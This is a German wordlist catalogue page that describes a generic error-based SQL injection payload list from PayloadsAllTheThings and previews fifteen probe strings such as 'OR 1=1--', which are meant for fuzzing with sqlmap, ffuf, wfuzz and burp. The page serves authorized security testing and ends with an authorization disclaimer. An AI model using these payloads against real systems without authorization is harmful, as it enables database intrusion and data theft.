SQLi Generic Error-Based Payloads
Generische, fehlerbasierte SQL-Injection-Probestrings (OR/AND-Boolesche Bedingungen, HAVING, Quote-Escaping), die SQL-Fehler über verschiedene DB-Engines hinweg auslösen und erkennen.
- Größe
- 2.9 KB
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- sqlmapffufwfuzzburp
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (2.9 KB) herunter oder kopiere sie über die Schaltflächen oben.
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1--
OR 1=0--
OR x=x--
OR x=y--
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
HAVING 1=1Generische, fehlerbasierte SQL-Injection-Probestrings (OR/AND-Boolesche Bedingungen, HAVING, Quote-Escaping), die SQL-Fehler über verschiedene DB-Engines hinweg auslösen und erkennen.
Diese Liste ist auf das Input-Fuzzing und die Schwachstellenerkennung ausgerichtet. Sie umfasst etwa 2.9 KB und harmoniert gut mit Tools wie sqlmap, ffuf, wfuzz, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger ins Gewicht fällt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Originalquelle auf GitHub ausgeliefert.
Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT vertrieben. Verwende Wortlisten nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.